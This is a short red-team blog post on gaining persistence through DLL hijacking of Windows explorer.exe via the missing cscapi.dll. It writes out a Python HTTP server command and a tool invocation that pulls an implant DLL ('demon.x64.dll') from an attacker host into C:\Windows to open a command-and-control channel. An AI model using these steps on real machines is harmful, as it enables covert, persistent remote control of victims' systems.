Windows File Explorer is the is the graphical file management utility for the Windows operating system and the default desktop environment. Windows explorer was introduced in Windows 95 and it is associated with the process explorer.exe. Since this is a native Windows process it could be used in red team operations for injection of arbitrary code. Processes which are missing DLL’s are prone to DLL Hijacking. Identification of missing DLL’s is trivial and requires process monitor to filter the explorer.exe for results that contain NAME NOT FOUND. One of the missing DLL’s that explorer.exe is missing is the cscapi.

Process Monitor – cscapi.dll

An HTTP server is required to serve the arbitrary DLL. From a Kali Linux box this is trivial by executing the following command:

python3 -m http.server 8080
Python Web Server

A public tool has been released that will communicate with the host serving the arbitrary DLL, retrieve and write the DLL into C:\Windows path. The tool require the IP address and the port of the server hosting the DLL and the DLL name.

DLLHijacking.exe 10.0.0.3 8080 demon.x64.dll
Explorer.exe – DLL Hijacking
Explorer.exe – cscapi.dll

The arbitrary DLL will load into the explorer.exe process on the next reboot and a communication channel with the Command and Control will established.

Explorer.exe – Implant
Host Enumeration

References

  1. https://github.com/gavz/ExplorerPersist

Leave a comment